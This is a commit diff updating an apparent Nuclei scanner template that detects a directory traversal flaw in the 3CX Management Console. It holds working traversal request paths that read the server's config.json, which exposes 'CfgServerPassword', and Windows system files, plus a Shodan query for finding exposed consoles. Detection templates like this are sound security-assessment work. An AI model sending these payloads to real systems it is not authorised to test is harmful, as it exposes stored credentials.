Update 3cx-management-console.yaml
parent
cbb575dddb
commit
0451a7c3ea
|
@ -5,23 +5,30 @@ info:
|
|||
author: random-robbie
|
||||
severity: high
|
||||
description: Directory traversal vulnerability on 3CX Management Console.
|
||||
reference: https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88
|
||||
metadata:
|
||||
shoda-query: http.title:"3CX Phone System Management Console"
|
||||
reference: https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88
|
||||
tags: 3cx,lfi,voip
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/Electron/download/windows/..\..\..\Http\webroot\config.json'
|
||||
- '{{BaseURL}}/Electron/download/windows/C:drivers\etc\hosts'
|
||||
matchers-condition: and
|
||||
- '{{BaseURL}}/Electron/download/windows/\windows\win.ini'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "CfgServerPassword"
|
||||
- "acme"
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "CfgServerPassword"
|
||||
- "CfgServerAppName"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "bit app support"
|
||||
- "fonts"
|
||||
- "extensions"
|
||||
condition: and
|
||||
|
|
Loading…
Reference in New Issue